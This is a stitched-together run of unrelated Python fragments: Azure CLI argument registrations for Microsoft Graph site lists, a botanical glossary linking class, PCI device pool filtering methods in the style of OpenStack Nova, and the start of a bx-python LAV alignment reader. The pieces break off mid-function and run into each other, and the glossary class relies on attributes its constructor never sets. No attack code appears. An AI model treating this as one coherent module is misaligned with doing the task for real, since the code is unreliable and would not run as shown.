the list item.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Fields')
with self.argument_context('sites siteslist create-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('application_id', type=str, help='Identifier of the application used to create the subscription. '
'Read-only.')
c.argument('change_type', type=str, help='Required. Indicates the type of change in the subscribed resource '
'that will raise a change notification. The supported values are: created, updated, deleted. '
'Multiple values can be combined using a comma-separated list. Note: Drive root item and list change '
'notifications support only the updated changeType. User and group change notifications support '
'updated and deleted changeType.')
c.argument('client_state', type=str, help='Optional. Specifies the value of the clientState property sent by '
'the service in each change notification. The maximum length is 128 characters. The client can '
'check that the change notification came from the service by comparing the value of the clientState '
'property sent with the subscription with the value of the clientState property received with each '
'change notification.')
c.argument('creator_id', type=str, help='Identifier of the user or service principal that created the '
'subscription. If the app used delegated permissions to create the subscription, this field '
'contains the id of the signed-in user the app called on behalf of. If the app used application '
'permissions, this field contains the id of the service principal corresponding to the app. '
'Read-only.')
c.argument('encryption_certificate', type=str, help='A base64-encoded representation of a certificate with a '
'public key used to encrypt resource data in change notifications. Optional. Required when '
'includeResourceData is true.')
c.argument('encryption_certificate_id', type=str, help='A custom app-provided identifier to help identify the '
'certificate needed to decrypt resource data. Optional.')
c.argument('expiration_date_time', help='Required. Specifies the date and time when the webhook subscription '
'expires. The time is in UTC, and can be an amount of time from subscription creation that varies '
'for the resource subscribed to. See the table below for maximum supported subscription length of '
'time.')
c.argument('include_resource_data', arg_type=get_three_state_flag(), help='When set to true, change '
'notifications include resource data (such as content of a chat message). Optional.')
c.argument('latest_supported_tls_version', type=str, help='')
c.argument('lifecycle_notification_url', type=str, help='')
c.argument('notification_url', type=str, help='Required. The URL of the endpoint that will receive the change '
'notifications. This URL must make use of the HTTPS protocol.')
c.argument('resource', type=str, help='Required. Specifies the resource that will be monitored for changes. Do '
'not include the base URL (https://graph.microsoft.com/v1.0/). See the possible resource path '
'values for each supported resource.')
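# Example invocation for the subscription arguments registered above
# (hypothetical ids and URL, for illustration only):
#   az sites siteslist create-subscription --site-id {site-id} \
#     --list-id {list-id} --change-type "updated" \
#     --notification-url "https://contoso.example/api/hook" \
#     --expiration-date-time "2021-01-01T11:23:00.000Z"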
with self.argument_context('sites siteslist delete-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-drive') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('list_item_id', type=str, help='key: id of listItem')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('subscription_id', type=str, help='key: id of subscription', id_part='subscription')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist list-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-drive') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('list_item_id', type=str, help='key: id of listItem')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('subscription_id', type=str, help='key: id of subscription', id_part='subscription')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist update-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('boolean', type=validate_file_or_dict, help='booleanColumn Expected value: '
'json-string/json-file/@json-file.')
c.argument('calculated', action=AddCalculated, nargs='+', help='calculatedColumn')
c.argument('choice', action=AddChoice, nargs='+', help='choiceColumn')
c.argument('column_group', type=str, help='For site columns, the name of the group this column belongs to. '
'Helps organize related columns.')
c.argument('date_time', action=AddDateTime, nargs='+', help='dateTimeColumn')
c.argument('default_value', action=AddDefaultValue, nargs='+', help='defaultColumnValue')
c.argument('description', type=str, help='The user-facing description of the column.')
c.argument('display_name', type=str, help='The user-facing name of the column.')
c.argument('enforce_unique_values', arg_type=get_three_state_flag(), help='If true, no two list items may have '
'the same value for this column.')
c.argument('geolocation', type=validate_file_or_dict, help='geolocationColumn Expected value: '
'json-string/json-file/@json-file.')
c.argument('hidden', arg_type=get_three_state_flag(), help='Specifies whether the column is displayed in the '
'user interface.')
c.argument('indexed', arg_type=get_three_state_flag(), help='Specifies whether the column values can be used for '
'sorting and searching.')
c.argument('lookup', action=AddLookup, nargs='+', help='lookupColumn')
c.argument('name', type=str, help='The API-facing name of the column as it appears in the [fields][] on a '
'[listItem][]. For the user-facing name, see displayName.')
c.argument('number', action=AddNumber, nargs='+', help='numberColumn')
c.argument('person_or_group', action=AddPersonOrGroup, nargs='+', help='personOrGroupColumn')
c.argument('read_only', arg_type=get_three_state_flag(), help='Specifies whether the column values can be '
'modified.')
c.argument('required', arg_type=get_three_state_flag(), help='Specifies whether the column value is not '
'optional.')
c.argument('text', action=AddText, nargs='+', help='textColumn')
c.argument('locale', type=str, help='Specifies the locale from which to infer the currency symbol.',
arg_group='Currency')
with self.argument_context('sites siteslist update-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('description', type=str, help='The descriptive text for the item.')
c.argument('group', type=str, help='The name of the group this content type belongs to. Helps organize related '
'content types.')
c.argument('hidden', arg_type=get_three_state_flag(), help='Indicates whether the content type is hidden in '
'the list\'s \'New\' menu.')
c.argument('name', type=str, help='The name of the content type.')
c.argument('order', action=AddOrder, nargs='+', help='contentTypeOrder')
c.argument('parent_id', type=str, help='The unique identifier of the content type.')
c.argument('read_only', arg_type=get_three_state_flag(), help='If true, the content type cannot be modified '
'unless this value is first set to false.')
c.argument('sealed', arg_type=get_three_state_flag(), help='If true, the content type cannot be modified by '
'users or through push-down operations. Only site collection administrators can seal or unseal '
'content types.')
c.argument('column_links', action=AddColumnLinks, nargs='+', help='The collection of columns that are required '
'by this content type')
c.argument('drive_id', type=str, help='Unique identifier of the drive instance that contains the item. '
'Read-only.', arg_group='Inherited From')
c.argument('drive_type', type=str, help='Identifies the type of drive. See [drive][] resource for values.',
arg_group='Inherited From')
c.argument('microsoft_graph_item_reference_id', type=str, help='Unique identifier of the item in the drive. '
'Read-only.', arg_group='Inherited From')
c.argument('microsoft_graph_item_reference_name', type=str, help='The name of the item being referenced. '
'Read-only.', arg_group='Inherited From')
c.argument('path', type=str, help='Path that can be used to navigate to the item. Read-only.',
arg_group='Inherited From')
import re
from operator import attrgetter
# My files
from args import *
from error import *
from files import *
from find_page import *
from easy import *
from trie import *
from parse import *
from cache import *
glossary_taxon_dict = {}
class Glossary:
def __init__(self, name):
self.name = name
# user-visible name of this glossary's coverage
# (defaults to its top-level taxon)
self.title = None
# name of this glossary's top-level taxon
# (or None, if it includes all taxons)
self.taxon = None
# top page used by this glossary (or None, if it applies to all pages)
self.page = None
self.parent = None # a single parent glossary (or None)
self.child = set() # an unordered set of child glossaries
self.is_jepson = False # changed to True for the Jepson glossary
# changed to True for a glossary that shouldn't appear in the ToC
self.invisible = False
# search_terms is an ordered list of term lists to be written
# to pages.js. The first term in each list is also the anchor.
#
# The anchor and all other terms are unmodified:
# - capitalization is retained for optimal display in auto-complete.
# - easy_sub is not applied because it would confuse search matching.
# (And the original punctuation can match any user punctuation.)
self.search_terms = []
# term_anchor is a mapping from each term to an HTML anchor.
# This is used for creating glossary_regex and also for looking up
# a matched term to get its anchor.
#
# The terms are modified somewhat:
# - terms are lowercase as the canonical form for comparison.
# - easy_sub is applied since that's what the regex will match.
# The anchor remains unmodified:
# - capitalization is retained for optimal display in the URL.
# - easy_sub is not applied because a URL doesn't support special
# HTML characters.
self.term_anchor = {}
# anchor_terms is a mapping from each anchor to a set of terms.
# This is used to exclude those terms within a definition line
# from linking. This is not used for the Jepson glossary
# since we don't create HTML for it.
#
# The anchor remains unmodified as above.
# The terms are modified as above.
self.anchor_terms = {}
# anchor_defined is a mapping from an anchor to the defined term
# as listed in the HTML. This is not used for the Jepson glossary
# since we don't create HTML for it.
#
# The anchor remains unmodified as above.
# The defined term is a string as follows:
# - it includes the anchor and any parenthesized terms that we
# want to display beside it.
# - capitalization is retained for optimal display in the HTML.
# - easy_sub is applied for optimal display in the HTML.
self.anchor_defined = {}
# anchor_list is a list of anchors, in glossary order.
# It is only used with arg -jepson_usage.
self.anchor_list = []
# figure_list is a list of filenames for figures used in the
# glossary page.
self.figure_list = []
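# Illustrative contents of the structures above for a glossary that
# defines a single term 'pistil' with variant 'pistils' (hypothetical):
#   search_terms:   [['pistil', 'pistils']]
#   term_anchor:    {'pistil': 'pistil', 'pistils': 'pistil'}
#   anchor_terms:   {'pistil': {'pistil', 'pistils'}}
#   anchor_defined: {'pistil': 'pistil (pistils)'}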
def set_parent(self, parent):
self.parent = parent
if parent:
parent.child.add(self)
def get_link_class(self):
if self.is_jepson:
return 'glossary-jepson'
else:
return 'glossary'
def get_filename(self):
no_spaces = re.sub(r' ', '-', self.name)
return filename(no_spaces)
def get_url(self):
if self.is_jepson:
return 'https://ucjeps.berkeley.edu/eflora/glossary.html'
else:
pageurl = url(self.get_filename())
return f'{pageurl}.html'
def create_link(self):
link_class = self.get_link_class()
pageurl = self.get_url()
return f'<a href="{pageurl}" class="{link_class}">{self.name}</a>'
def glossary_link(self, anchor, term):
link_class = self.get_link_class()
pageurl = self.get_url()
anchorurl = url(anchor)
return f'<a class="{link_class}" href="{pageurl}#{anchorurl}">{term}</a>'
def find_dups(self, term):
dup_list = []
# Find ancestors of this glossary that define the same term.
ancestor = self.parent
while ancestor:
if term in ancestor.term_anchor:
link = ancestor.glossary_link(ancestor.term_anchor[term],
ancestor.name)
dup_list.append(link)
ancestor = ancestor.parent
# We built the list of shared ancestors from lowest ancestor to
# highest ancestor, but we want the full dup_list to be from
# highest glossary to lowest.
dup_list.reverse()
for child in sorted(self.child, key=attrgetter('name')):
dup_list.extend(child.find_dups_in_children(term))
return dup_list
def find_dups_in_children(self, term):
dup_list = []
if term in self.term_anchor:
link = self.glossary_link(self.term_anchor[term], self.name)
dup_list.append(link)
for child in sorted(self.child, key=attrgetter('name')):
dup_list.extend(child.find_dups_in_children(term))
return dup_list
# For the given term, get a link within the glossary or its ancestors.
# Search ancestors only when deep=True.
# Return None if the term isn't in the glossary (or its ancestors).
def get_link(self, term, is_glossary, deep, child=None):
lower = term.lower()
if lower in self.link_set:
anchor = self.term_anchor[lower]
if self.is_jepson:
if anchor in self.used_dict:
self.used_dict[anchor] += 1
else:
self.used_dict[anchor] = 1
return self.glossary_link(anchor, term)
elif deep and self.parent:
return self.parent.get_link(term, is_glossary, True, child=self)
else:
return None
def link_glossary_words(self, assoc_name, assoc_page, txt,
is_glossary=False, exclude=None):
# This function is called for a glossary word match.
# Replace the matched word with a link to the primary term
# in the glossary.
def repl_glossary(matchobj):
term = matchobj.group(1)
if '#' in term:
(name, partition, bare_term) = term.partition('#')
if bare_term == '':
# I'd love to print what file this error occurred in, but
# that requires an exception or a global variable or passing
# more data around, none of which I like. The user will
# have to grep for the broken reference in the HTML.
error(f'unrecognized glossary cross reference starting with "{name}#" in {assoc_name}')
return f'{name}#broken ref'
elif name == 'none':
# 'none#[term]' means that we don't want a glossary link.
# Discard the 'none#' and return only the bare term.
return bare_term
else:
glossary = glossary_name_dict[name + ' glossary']
link = glossary.get_link(bare_term, is_glossary, False)
if link:
return link
else:
# We didn't find a link for the cross reference, but
# maybe we will if we use a shorter term.
# While keeping the cross-reference marker, cut off
# the end of the term and try glossary substitution
# again.
matchobj = re.match(r'(.*\W)(\w+)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
if not term1.endswith('#'):
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if link:
return alt_term
else:
error(f'bad glossary cross reference {term}')
return term
# Continue for the default case without a '#' cross-ref.
exclude_term = (exclude and term.lower() in exclude)
if exclude_term:
# Don't make a link for an excluded term. Instead, check
# for potential links in subsets of the term, then default
# to returning the unmodified term.
link = None
else:
link = self.get_link(term, is_glossary, True)
# We can't find a link for the term (or it is excluded,
# so we don't want to make a link for it.) However,
# a subset of the term might match a different glossary
# entry. So separate the last letter and try to link again.
# This will perform the next-highest priority match if
# possible. If nothing changes, instead separate the first
# letter and try to link again. (Note that this doesn't
# catch the case where a match could be made starting
# inside the excluded term and extending beyond its end.
# I doubt that would ever matter, and if it did we'd just
# miss a link. Not a big deal.)
if not link:
matchobj = re.match(r'(.*\W)(\w+)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if not link:
matchobj = re.match(r'(\w+)(\W.*)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if link:
return link
elif exclude_term:
return term
else:
# Term not found in the applicable glossaries.
# Check whether the term is in any of the glossaries for which
# a warning should be printed.
if assoc_page:
for glossary in assoc_page.glossary_warn:
if term.lower() in glossary.link_set:
error(f'{term} in {assoc_name}',
prefix='Glossary term is used outside of its glossary hierarchy:')
break
return term
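# Cross-reference marker syntax handled above (hypothetical terms):
#   'jepson#adnate' -> link 'adnate' using only the 'jepson glossary'
#   'none#adnate'   -> suppress linking and emit the bare term
#   'jepson#'       -> reported as a broken cross reference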
# Perform glossary substitution on a fragment of "safe text", i.e.
# one without HTML tags.
def _filter_pools_for_spec(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools that don't match the request's device spec.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
request_specs = request.spec
return [
pool for pool in pools
if utils.pci_device_prop_match(pool, request_specs)
]
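# A minimal standalone sketch of the spec-matching idea used above.
# `_prop_match_sketch` is a simplified stand-in for
# utils.pci_device_prop_match (hypothetical; the real helper also
# understands flags and lists of accepted values):
def _prop_match_sketch(pool, specs):
    # A pool matches if, for at least one spec dict, every key/value
    # pair in the spec is present in the pool.
    return any(
        all(pool.get(k) == v for k, v in spec.items()) for spec in specs
    )

_pools = [
    {'vendor_id': '8086', 'product_id': '1520', 'count': 2},
    {'vendor_id': '15b3', 'product_id': '1014', 'count': 4},
]
_specs = [{'vendor_id': '8086', 'product_id': '1520'}]
assert [p['count'] for p in _pools if _prop_match_sketch(p, _specs)] == [2]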
def _filter_pools_for_numa_cells(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.List[Pool]:
"""Filter out pools with the wrong NUMA affinity, if required.
Exclude pools that do not have *suitable* PCI NUMA affinity.
``numa_policy`` determines what *suitable* means, being one of
PREFERRED (nice-to-have), LEGACY (must-have-if-available) and REQUIRED
(must-have). We iterate through the various policies in order of
strictness. This means that even if we only *prefer* PCI-NUMA affinity,
we will still attempt to provide it if possible.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells.
:returns: A list of pools that can, together, provide at least
``requested_count`` PCI devices with the level of NUMA affinity
required by ``numa_policy``, else all pools that can satisfy this
policy even if it's not enough.
"""
if not numa_cells:
return pools
# we default to the 'legacy' policy for...of course...legacy reasons
requested_policy = fields.PCINUMAAffinityPolicy.LEGACY
if 'numa_policy' in request:
requested_policy = request.numa_policy or requested_policy
requested_count = request.count
numa_cell_ids = [cell.id for cell in numa_cells]
# filter out pools whose numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# we can't apply a less strict policy than the one requested, so we
# need to return if we've demanded a NUMA affinity of REQUIRED.
# However, NUMA affinity is a good thing. If we can get enough devices
# with the stricter policy then we will use them.
if requested_policy == fields.PCINUMAAffinityPolicy.REQUIRED or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# the SOCKET policy is a bit of a special case. It's less strict than
# REQUIRED (so REQUIRED will automatically fulfil SOCKET, at least
# with our assumption of never having multiple sockets per NUMA node),
# but not always more strict than LEGACY: a PCI device with no NUMA
# affinity will fulfil LEGACY but not SOCKET. If we have SOCKET,
# process it here and don't continue.
if requested_policy == fields.PCINUMAAffinityPolicy.SOCKET:
return self._filter_pools_for_socket_affinity(pools, numa_cells)
# some systems don't report NUMA node info for PCI devices, in which
# case None is reported in 'pci_device.numa_node'. The LEGACY policy
# allows us to use these devices so we include None in the list of
# suitable NUMA cells.
numa_cell_ids.append(None)
# filter out pools whose numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# once again, we can't apply a less strict policy than the one
# requested, so we need to return if we've demanded a NUMA affinity of
# LEGACY. Similarly, we will also return if we have enough devices to
# satisfy this somewhat strict policy.
if requested_policy == fields.PCINUMAAffinityPolicy.LEGACY or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# if we've got here, we're using the PREFERRED policy and weren't able
# to provide anything with stricter affinity. Use whatever devices you
# can, folks.
return sorted(
pools, key=lambda pool: pool.get('numa_node') not in numa_cell_ids)
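# Worked example of the policy ladder above (illustrative values):
# pools = [{'numa_node': 0, 'count': 1}, {'numa_node': None, 'count': 1},
#          {'numa_node': 1, 'count': 1}], guest cells on host node 0,
# request.count = 2:
#   REQUIRED:  only the numa_node=0 pool is returned (even though 1 < 2)
#   LEGACY:    numa_node in (0, None) -> 2 devices, request satisfied
#   PREFERRED: all pools kept, sorted so node 0 and None come first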
def _filter_pools_for_socket_affinity(
self,
pools: ty.List[Pool],
numa_cells: ty.List['objects.InstanceNUMACell'],
) -> ty.List[Pool]:
host_cells = self.numa_topology.cells
# bail early if we don't have socket information for all host_cells.
# This could happen if we're running on a weird older system with
# multiple sockets per NUMA node, which is a configuration that we
# explicitly chose not to support.
if any(cell.socket is None for cell in host_cells):
LOG.debug('No socket information in host NUMA cell(s).')
return []
# get a set of host sockets that the guest cells are in. Since guest
# cell IDs map to host cell IDs, we can just look up the latter's
# socket.
socket_ids = set()
for guest_cell in numa_cells:
for host_cell in host_cells:
if guest_cell.id == host_cell.id:
socket_ids.add(host_cell.socket)
# now get a set of host NUMA nodes that are in the above sockets
allowed_numa_nodes = set()
for host_cell in host_cells:
if host_cell.socket in socket_ids:
allowed_numa_nodes.add(host_cell.id)
# filter out pools that are not in one of the correct host NUMA nodes.
return [
pool for pool in pools if any(
utils.pci_device_prop_match(pool, [{'numa_node': numa_node}])
for numa_node in allowed_numa_nodes
)
]
def _filter_pools_for_unrequested_pfs(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with PFs, unless these are required.
This is necessary in cases where PFs and VFs have the same product_id
and generally useful elsewhere.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.SRIOV_PF
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.SRIOV_PF
]
return pools
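# Example: a request whose spec is [{'vendor_id': '8086'}] never asks for
# dev_type 'type-PF', so any PF pool is dropped here and VFs that share
# the PF's product_id cannot be shadowed by their parent device.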
def _filter_pools_for_unrequested_vdpa_devices(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with VDPA devices, unless these are required.
This is necessary as vdpa devices require special handling and
should not be allocated to generic pci device requests.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.VDPA
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.VDPA
]
return pools
def _filter_pools_for_unrequested_remote_managed_devices(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with remote_managed devices, unless requested.
Remote-managed devices are not usable for legacy SR-IOV or hardware
offload scenarios and must be excluded from allocation.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(not strutils.bool_from_string(spec.get(PCI_REMOTE_MANAGED_TAG))
for spec in request.spec):
pools = [pool for pool in pools
if not strutils.bool_from_string(
pool.get(PCI_REMOTE_MANAGED_TAG))]
return pools
def _filter_pools(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.Optional[ty.List[Pool]]:
"""Determine if an individual PCI request can be met.
Filter pools, which are collections of devices with similar traits, to
identify those that can support the provided PCI request.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: A list of pools that can be used to support the request if
this is possible, else None.
"""
# NOTE(vladikr): This code may be open to race conditions.
# Two concurrent requests may both succeed when calling support_requests
# because this method does not remove matched devices from the pools.
# Firstly, let's exclude all devices that don't match our spec (e.g.
# they've got different PCI IDs or something)
before_count = sum([pool['count'] for pool in pools])
pools = self._filter_pools_for_spec(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) due to mismatched PCI attribute(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# Next, let's exclude all devices that aren't on the correct NUMA node
# or socket, if requested.
"""
Support for reading and writing the LAV format produced by the `blastz`_
pairwise aligner.
.. _blastz: http://www.bx.psu.edu/miller_lab/
"""
from bx.align import *
import bx.seq
import sys,math,StringIO
import itertools
from bx import interval_index_file
class Reader(object):
"""Iterate over all lav blocks in a file in order"""
def __init__(self,file,path_subs=None,fail_to_ns=False):
self.file = file
self.lineNumber = 0
self.path_subs = path_subs # list of (prefix,replacement) to allow
if (self.path_subs == None): # .. redirection of sequence file paths
self.path_subs = [] # .. on different machines
self.fail_to_ns = fail_to_ns # True => if sequences fail to open,
# create a fake file of all Ns
self.d_stanza_text = None
self.seq1_filename = None
self.seq1_file = None
self.seq1_header = None
self.seq1_start = None
self.seq1_end = None
self.seq1_strand = None
self.seq1_contig = None
self.seq1_src = None
self.seq1_gap = None
self.seq2_filename = None
self.seq2_file = None
self.seq2_header = None
self.seq2_start = None
self.seq2_end = None
self.seq2_strand = None
self.seq2_contig = None
self.seq2_src = None
self.seq2_gap = None
def next(self):
while (True):
line = self.fetch_line(strip=None,requireLine=False)
assert (line), "unexpected end of file (missing #:eof)"
line = line.rstrip()
if (line == ""): # (allow blank lines between stanzas)
continue
if (line == "#:eof"):
line = self.file.readline().rstrip()
assert (not line), "extra line after #:eof (line %d, \"%s\")" \
% (self.lineNumber,line)
return None
if (line == "#:lav"):
continue
if (line.startswith("d {")):
self.d_stanza_text = self.parse_unknown_stanza()
continue
if (line.startswith("s {")):
self.parse_s_stanza()
continue
if (line.startswith("h {")):
self.parse_h_stanza()
continue
if (line.startswith("a {")):
(score,pieces) = self.parse_a_stanza()
break
if (line.endswith("{")):
self.parse_unknown_stanza()
continue
assert (False), "incomprehensible line (line %d, \"%s\")" \
% (self.lineNumber,line)
return self.build_alignment(score,pieces)
def __iter__(self):
return ReaderIter(self)
def close(self):
self.file.close()
def open_seqs(self):
if (self.seq1_file != None) and (self.seq2_file != None):
return
if (self.seq1_file == None):
if (self.seq1_strand == "+"): revcomp = False
else: revcomp = "-5'"
if (self.seq1_contig == 1): contig = None
else: contig = self.seq1_contig
try:
f = file(self.seq1_filename,"rb")
except:
if (self.fail_to_ns):
f = StringIO.StringIO(">seq1\n" + ("n" * (self.seq1_end - self.seq1_start)))
revcomp = False
contig = 1
else:
assert (False), "failed to open %s" % self.seq1_filename
self.seq1_file = bx.seq.seq_file(f,revcomp=revcomp,contig=contig)
self.seq1_gap = self.seq1_file.gap
try:
name1 = self.header_to_src_name(self.seq1_header)
except ValueError:
try:
name1 = self.path_to_src_name(self.seq1_filename)
except ValueError:
name1 = "seq1"
(species1,chrom1) = src_split(name1)
self.seq1_src = src_merge(species1,chrom1,contig)
if (contig != None): chrom1 += "[%s]" % contig
if (self.seq2_file == None):
if (self.seq2_strand == "+"): revcomp = False
else: revcomp = "-5'"
if (self.seq2_contig == 1): contig = None
else: contig = self.seq2_contig
try:
f = file(self.seq2_filename,"rb")
except:
if (self.fail_to_ns):
f = StringIO.StringIO(">seq2\n" + ("n" * (self.seq2_end - self.seq2_start)))
revcomp = False
contig = 1
else:
assert (False), "failed to open %s" % self.seq2_filename
self.seq2_file = bx.seq.seq_file(f,revcomp=revcomp,contig=contig)
self.seq2_gap = self.seq2_file.gap
try:
name2 = self.header_to_src_name(self.seq2_header)
except ValueError:
try:
name2 = self.path_to_src_name(self.seq2_filename)
except ValueError:
name2 = "seq2"
(species2,chrom2) = src_split(name2)
self.seq2_src = src_merge(species2,chrom2,contig)
if (contig != None): chrom2 += "[%s]" % contig
length1 = self.seq1_file.length
length2 = self.seq2_file.length
assert (species1 != species2) or (chrom1 != chrom2) or (length1 == length2), \
"conflicting lengths for %s (%d and %d)" % (self.seq1_src,length1,length2)
self.species_to_lengths = {}
self.species_to_lengths[species1] = {}
self.species_to_lengths[species2] = {} # (OK if it clobbers line above)
self.species_to_lengths[species1][chrom1] = self.seq1_file.length
self.species_to_lengths[species2][chrom2] = self.seq2_file.length
def close_seqs(self):
if (self.seq1_file != None):
self.seq1_file.close()
self.seq1_file = None
if (self.seq2_file != None):
self.seq2_file.close()
self.seq2_file = None
def parse_s_stanza(self):
self.close_seqs()
line = self.fetch_line(report=" in s-stanza")
(self.seq1_filename,
self.seq1_start,
self.seq1_end,
self.seq1_strand,
self.seq1_contig) = self.parse_s_seq(line)
line = self.fetch_line(report=" in s-stanza")
(self.seq2_filename,
self.seq2_start,
self.seq2_end,
self.seq2_strand,
self.seq2_contig) = self.parse_s_seq(line)
line = self.fetch_line(report=" in s-stanza")
assert (line == "}"), "improper s-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
def parse_s_seq(self,line):
fields = line.split()
filename = fields[0].strip('"')
start = int(fields[1]) - 1
